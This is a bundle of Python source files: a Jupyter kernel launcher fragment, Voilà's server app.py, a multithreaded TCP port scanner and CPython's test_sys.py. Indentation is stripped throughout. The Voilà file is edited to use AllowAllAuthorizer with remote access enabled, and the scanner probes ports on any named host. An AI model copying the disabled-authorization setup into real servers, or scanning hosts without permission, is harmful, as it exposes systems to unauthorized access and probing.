port_ranges = port_range.split("..")
lower_port = int(port_ranges[0])
upper_port = int(port_ranges[1])
port_range_size = upper_port - lower_port
if port_range_size != 0:
if port_range_size < min_port_range_size:
raise RuntimeError(
"Port range validation failed for range: '{}'. Range size must be at least {} as specified by"
" env EG_MIN_PORT_RANGE_SIZE".format(port_range, min_port_range_size))
except ValueError as ve:
raise RuntimeError("Port range validation failed for range: '{}'. Error was: {}".format(port_range, ve))
except IndexError as ie:
raise RuntimeError("Port range validation failed for range: '{}'. Error was: {}".format(port_range, ie))
return lower_port, upper_port
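# Examples (illustrative), with the default EG_MIN_PORT_RANGE_SIZE of 1000:
#   _validate_port_range(None)            -> (0, 0)        # no range imposed
#   _validate_port_range("40000..41000")  -> (40000, 41000)
#   _validate_port_range("40000..40100")  -> RuntimeError (range smaller than minimum)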
def get_gateway_request(sock):
conn = None
data = ''
request_info = None
try:
conn, addr = sock.accept()
while True:
buffer = conn.recv(1024).decode('utf-8')
if not buffer: # send is complete
request_info = json.loads(data)
break
data = data + buffer # append what we received until we get no more...
except Exception as e:
if type(e) is not socket.timeout:
raise e
finally:
if conn:
conn.close()
return request_info
def gateway_listener(sock, parent_pid):
shutdown = False
while not shutdown:
request = get_gateway_request(sock)
if request:
signum = -1 # prevent logging poll requests since that occurs every 3 seconds
if request.get('signum') is not None:
signum = int(request.get('signum'))
os.kill(parent_pid, signum)
if request.get('shutdown') is not None:
shutdown = bool(request.get('shutdown'))
if signum != 0:
logger.info("gateway_listener got request: {}".format(request))
def start_ipython(namespace, cluster_type="spark", **kwargs):
from IPython import embed_kernel
# create an initial list of variables to clear
# we do this without deleting to preserve the locals so that
# initialize_namespace isn't affected by this mutation
to_delete = [k for k in namespace if not k.startswith('__')]
# initialize the namespace with the proper variables
initialize_namespace(namespace, cluster_type=cluster_type)
# delete the extraneous variables
for k in to_delete:
del namespace[k]
# Start the kernel
embed_kernel(local_ns=namespace, **kwargs)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('connection_file', nargs='?', help='Connection file to write connection info')
parser.add_argument('--RemoteProcessProxy.response-address', dest='response_address', nargs='?',
metavar='<ip>:<port>', help='Connection address (<ip>:<port>) for returning connection file')
parser.add_argument('--RemoteProcessProxy.kernel-id', dest='kernel_id', nargs='?',
help='Indicates the id associated with the launched kernel.')
parser.add_argument('--RemoteProcessProxy.port-range', dest='port_range', nargs='?',
metavar='<lowerPort>..<upperPort>', help='Port range to impose for kernel ports')
parser.add_argument('--RemoteProcessProxy.spark-context-initialization-mode', dest='init_mode', nargs='?',
default='none', help='the initialization mode of the spark context: lazy, eager or none')
parser.add_argument('--RemoteProcessProxy.cluster-type', dest='cluster_type', nargs='?',
default='spark', help='the kind of cluster to initialize: spark, dask, or none')
arguments = vars(parser.parse_args())
connection_file = arguments['connection_file']
response_addr = arguments['response_address']
kernel_id = arguments['kernel_id']
lower_port, upper_port = _validate_port_range(arguments['port_range'])
spark_init_mode = arguments['init_mode']
cluster_type = arguments['cluster_type']
ip = "0.0.0.0"
if connection_file is None and kernel_id is None:
raise RuntimeError("At least one of the parameters: 'connection_file' or "
"'--RemoteProcessProxy.kernel-id' must be provided!")
# If the connection file doesn't exist, then create it.
if (connection_file and not os.path.isfile(connection_file)) or kernel_id is not None:
key = str_to_bytes(str(uuid.uuid4()))
connection_file = determine_connection_file(connection_file, kernel_id)
ports = _select_ports(5, lower_port, upper_port)
write_connection_file(fname=connection_file, ip=ip, key=key, shell_port=ports[0], iopub_port=ports[1],
stdin_port=ports[2], hb_port=ports[3], control_port=ports[4])
if response_addr:
gateway_socket = return_connection_info(connection_file, response_addr, lower_port, upper_port)
if gateway_socket: # socket in use, start gateway listener thread
gateway_listener_process = Process(target=gateway_listener, args=(gateway_socket, os.getpid(),))
gateway_listener_process.start()
# Initialize the kernel namespace for the given cluster type
if cluster_type == 'spark' and spark_init_mode == 'none':
cluster_type = 'none'
# launch the IPython kernel instance
start_ipython(locals(), cluster_type=cluster_type, connection_file=connection_file, ip=ip)
try:
os.remove(connection_file)
except Exception:
pass
|
app.py
|
#############################################################################
# Copyright (c) 2018, Voilà Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
import gettext
import io
import sys
import json
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
import errno
import random
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets.config.loader import Config
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import FileFindHandler, path_regex
from jupyter_server.config_manager import recursive_update
from jupyter_server.utils import url_path_join, run_sync
from jupyter_server.services.config import ConfigManager
from jupyter_server.auth.authorizer import AllowAllAuthorizer # mark@saeon
from jupyterlab_server.themes_handler import ThemesHandler
from jupyter_client.kernelspec import KernelSpecManager
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, collect_static_paths
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler, TemplateStaticFileHandler, WhiteListFileHandler
from .configuration import VoilaConfiguration
from .execute import VoilaExecutor
from .exporter import VoilaExporter
from .shutdown_kernel_handler import VoilaShutdownKernelHandler
from .voila_kernel_manager import voila_kernel_manager_factory
from .query_parameters_handler import QueryStringSocketHandler
from .utils import create_include_assets_functions
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'debug': (
{
'Voila': {'log_level': logging.DEBUG},
'VoilaConfiguration': {'show_tracebacks': True},
},
_("Set the log level to logging.DEBUG, and show exception tracebacks in output.")
),
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the Voilà server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
'Will autoreload the server and the page when a template, js file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions',
'show_tracebacks': 'VoilaConfiguration.show_tracebacks',
'preheat_kernel': 'VoilaConfiguration.preheat_kernel',
'pool_size': 'VoilaConfiguration.default_pool_size'
}
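# For example (illustrative invocation), the aliases above let users write
#   voila notebook.ipynb --port=8867 --theme=dark --template=lab
# which maps onto Voila.port, VoilaConfiguration.theme and
# VoilaConfiguration.template respectively.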
classes = [
VoilaConfiguration,
VoilaExecutor,
VoilaExporter
]
connection_dir_root = Unicode(
config=True,
help=_(
'Location of temporary connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for Voilà API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will serve the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
'Path prefix for Voilà API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with Voilà'
)
)
template_paths = List(
[],
config=True,
help=_(
'path to jinja2 templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
port_retries = Integer(50, config=True,
help=_("The number of additional ports to try if the specified port is not available.")
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado 6 (at least) is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overridable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
def initialize(self, argv=None):
self._init_asyncio_patch()
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
template_name = self.voila_configuration.template
self.template_paths = collect_template_paths(['voila', 'nbconvert'], template_name, prune=True)
self.static_paths = collect_static_paths(['voila', 'nbconvert'], template_name)
conf_paths = [os.path.join(d, 'conf.json') for d in self.template_paths]
for p in conf_paths:
# see if config file exists
if os.path.exists(p):
# load the template-related config
with open(p) as json_file:
conf = json.load(json_file)
# update the overall config with it, preserving CLI config priority
if 'traitlet_configuration' in conf:
recursive_update(conf['traitlet_configuration'], self.voila_configuration.config.VoilaConfiguration)
# pass merged config to overall Voilà config
self.voila_configuration.config.VoilaConfiguration = Config(conf['traitlet_configuration'])
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_spec_manager = KernelSpecManager(
parent=self
)
# we create a config manager that loads both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
self.contents_manager = LargeFileManager(parent=self)
preheat_kernel: bool = self.voila_configuration.preheat_kernel
pool_size: int = self.voila_configuration.default_pool_size
kernel_manager_class = voila_kernel_manager_factory(
self.voila_configuration.multi_kernel_manager_class,
preheat_kernel,
pool_size
)
self.kernel_manager = kernel_manager_class(
parent=self,
connection_dir=self.connection_dir,
kernel_spec_manager=self.kernel_spec_manager,
allowed_message_types=[
'comm_open',
'comm_close',
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
kernel_spec_manager=self.kernel_spec_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
self.app.settings.update(dict(authorizer=AllowAllAuthorizer())) # mark@saeon
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/templates/(.*)'),
TemplateStaticFileHandler
),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
},
),
(
url_path_join(self.server_url, r'/voila/themes/(.*)'),
ThemesHandler,
{
'themes_url': '/voila/themes',
'path': '',
'labextensions_path': jupyter_path('labextensions'),
'no_cache_paths': ['/']
},
),
(url_path_join(self.server_url, r'/voila/api/shutdown/(.*)'), VoilaShutdownKernelHandler)
])
if preheat_kernel:
handlers.append(
(
url_path_join(self.server_url, r'/voila/query/%s' % _kernel_id_regex),
QueryStringSocketHandler
)
)
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
handlers.append(
(
url_path_join(self.server_url, r'/voila/files/(.*)'),
WhiteListFileHandler,
{
'whitelist': self.voila_configuration.file_whitelist,
'blacklist': self.voila_configuration.file_blacklist,
'path': self.root_dir,
},
)
)
tree_handler_conf = {
'voila_configuration': self.voila_configuration
}
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/(.*)'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/tree' + path_regex),
VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/render/(.*)'),
VoilaHandler,
{
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
run_sync(self.kernel_manager.shutdown_all())
def random_ports(self, port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
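# Worked example (illustrative): with port=8866 and n=10 this yields 8866..8870 first,
# then 5 more values drawn uniformly from [8866 - 20, 8866 + 20], clamped to be >= 1.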
def listen(self):
success = False
for port in self.random_ports(self.port, self.port_retries+1):
try:
self.app.listen(port, self.ip)
self.port = port
self.log.info('Voilà is running at:\n%s' % self.display_url)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info(_('The port %i is already in use, trying another port.') % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on port %i denied") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical(_('ERROR: the Voilà server could not be started because '
'no available port could be found.'))
self.exit(1)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
include_assets_functions = create_include_assets_functions(self.voila_configuration.template, url)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(
open_url=url, base_url=url,
theme=self.voila_configuration.theme,
**include_assets_functions
))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
|
scanport1.py
|
import sys
import subprocess
import socket
import threading
import time
class PortScanner:
# default ports to be scanned
# or put any ports you want to scan here!
__port_list = [1,3,6,9,13,17,19,20,21,22,23,24,25,30,32,37,42,49,53,70,79,80,81,82,83,84,88,89,99,106,109,110,113,119,125,135,139,143,146,161,163,179,199,211,222,254,255,259,264,280,301,306,311,340,366,389,406,416,425,427,443,444,458,464,481,497,500,512,513,514,524,541,543,544,548,554,563]
# default thread number limit
__thread_limit = 1000
# default connection timeout time in seconds
__delay = 10
"""
Constructor of a PortScanner object
Keyword arguments:
target_ports -- the list of ports that are going to be scanned (default self.__port_list)
"""
def __init__(self, target_ports = None):
# If target ports not given in the arguments, use default ports
# If target ports is given in the arguments, use given port lists
if target_ports is None:
self.target_ports = self.__port_list
else:
self.target_ports = target_ports
"""
Print the usage information for an invalid input host name.
"""
def __usage(self):
print('python Port Scanner v0.1')
print('please make sure the input host name is in the form of "something.com" or "http://something.com"!\n')
"""
This is the function that needs to be called to perform port scanning
Keyword arguments:
host_name -- the hostname that is going to be scanned
message -- the message that is going to be included in the scanning packets, in order to avoid
ethical problems (default: '')
"""
def scan(self, host_name, message = ''):
if 'http://' in host_name or 'https://' in host_name:
host_name = host_name[host_name.find('://') + 3 : ]
print('*' * 60 + '\n')
print('start scanning website: ' + str(host_name))
try:
server_ip = socket.gethostbyname(str(host_name))
print('server ip is: ' + str(server_ip))
except socket.error as e:
# If the DNS resolution of a website cannot be finished, abort that website.
#print(e)
print('hostname %s unknown!!!' % host_name)
self.__usage()
return {}
# May need to return specified values to the DB in the future
start_time = time.time()
output = self.__scan_ports(server_ip, self.__delay, message)
stop_time = time.time()
print('host %s scanned in %f seconds' %(host_name, stop_time - start_time))
print('finish scanning!\n')
return output
"""
Set the maximum number of threads for port scanning
Keyword argument:
num -- the maximum number of threads running concurrently (default 1000)
"""
def set_thread_limit(self, num):
num = int(num)
if num <= 0 or num > 50000:
print('Warning: Invalid thread number limit! Please make sure the thread limit is within the range of [1, 50000]!')
print('The scanning process will use default thread limit!')
return
self.__thread_limit = num
"""
Set the time out delay for port scanning in seconds
Keyword argument:
delay -- the time in seconds that a TCP socket waits until timeout (default 10)
"""
def set_delay(self, delay):
delay = int(delay)
if delay <= 0 or delay > 100:
print('Warning: Invalid delay value! Please make sure the input delay is within the range of [1, 100]')
print('The scanning process will use the default delay time')
return
self.__delay = delay
"""
Print out the list of ports being scanned
"""
def show_target_ports(self):
print ('Current port list is:')
print (self.target_ports)
"""
Print out the delay in seconds that a TCP socket waits until timeout
"""
def show_delay(self):
print ('Current timeout delay is :%d' %(int(self.__delay)))
"""
Open multiple threads to perform port scanning
Keyword arguments:
ip -- the ip address that is being scanned
delay -- the time in seconds that a TCP socket waits until timeout
output -- a dict() that stores result pairs in {port, status} style (status = 'OPEN' or 'CLOSE')
message -- the message that is going to be included in the scanning packets, in order to avoid
ethical problems (default: '')
"""
def __scan_ports_helper(self, ip, delay, output, message):
'''
Multithreading port scanning
'''
port_index = 0
while port_index < len(self.target_ports):
# Ensure that the number of concurrently running threads does not exceed the thread limit
while threading.activeCount() < self.__thread_limit and port_index < len(self.target_ports):
# Start threads
thread = threading.Thread(target = self.__TCP_connect, args = (ip, self.target_ports[port_index], delay, output, message))
thread.start()
port_index = port_index + 1
"""
Controller of the __scan_ports_helper() function
Keyword arguments:
ip -- the ip address that is being scanned
delay -- the time in seconds that a TCP socket waits until timeout
message -- the message that is going to be included in the scanning packets, in order to avoid
ethical problems (default: '')
"""
def __scan_ports(self, ip, delay, message):
output = {}
thread = threading.Thread(target = self.__scan_ports_helper, args = (ip, delay, output, message))
thread.start()
# Wait until all port scanning threads finished
while (len(output) < len(self.target_ports)):
continue
# Print open ports from small to large
for port in self.target_ports:
if output[port] == 'OPEN':
print(str(port) + ': ' + output[port] + '\n')
return output
"""
Perform status checking for a given port on a given ip address using TCP handshake
Keyword arguments:
ip -- the ip address that is being scanned
port_number -- the port that is going to be checked
delay -- the time in seconds that a TCP socket waits until timeout
output -- a dict() that stores result pairs in {port, status} style (status = 'OPEN' or 'CLOSE')
message -- the message that is going to be included in the scanning packets, in order to avoid
ethical problems (default: '')
"""
def __TCP_connect(self, ip, port_number, delay, output, message):
# Initialize the TCP socket object
TCP_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TCP_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
TCP_sock.settimeout(delay)
# Initialize a UDP socket to send a scanning alert message if there is a non-empty message
if message != '':
UDP_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
UDP_sock.sendto(str(message), (ip, int(port_number)))
try:
result = TCP_sock.connect_ex((ip, int(port_number)))
if message != '':
TCP_sock.sendall(str(message))
# If the TCP handshake is successful, the port is OPEN. Otherwise it is CLOSE
if result == 0:
output[port_number] = 'OPEN'
else:
output[port_number] = 'CLOSE'
TCP_sock.close()
except socket.error as e:
output[port_number] = 'CLOSE'
pass
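# Minimal usage sketch (added for illustration, not part of the original script).
# It only scans the local machine, so it is safe to run directly.
if __name__ == '__main__':
    scanner = PortScanner()          # use the default port list
    scanner.set_delay(3)             # 3 second TCP timeout per port
    scanner.set_thread_limit(200)    # cap the number of concurrent threads
    results = scanner.scan('127.0.0.1')
    print('open ports: %s' % [p for p in results if results[p] == 'OPEN'])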
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
import sys, cStringIO, os
import struct
class SysModuleTest(unittest.TestCase):
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assert_(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assert_(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assert_(typ is not None)
self.assert_(value is exc)
self.assert_(traceback is not None)
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assert_(typ is None)
self.assert_(value is None)
self.assert_(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assert_(typ1 is typ2)
self.assert_(value1 is exc)
self.assert_(value1 is value2)
self.assert_(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit, exc:
self.assertEquals(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit(42)
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit((42,))
except SystemExit, exc:
self.assertEquals(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit, exc:
self.assertEquals(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit, exc:
self.assertEquals(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
import subprocess
# both unnormalized...
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit, 46"])
self.assertEqual(rc, 46)
# ... and normalized
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assert_(isinstance(sys.getdefaultencoding(), str))
# testing sys.settrace() is done in test_trace.py
# testing sys.setprofile() is done in test_profile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEquals(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
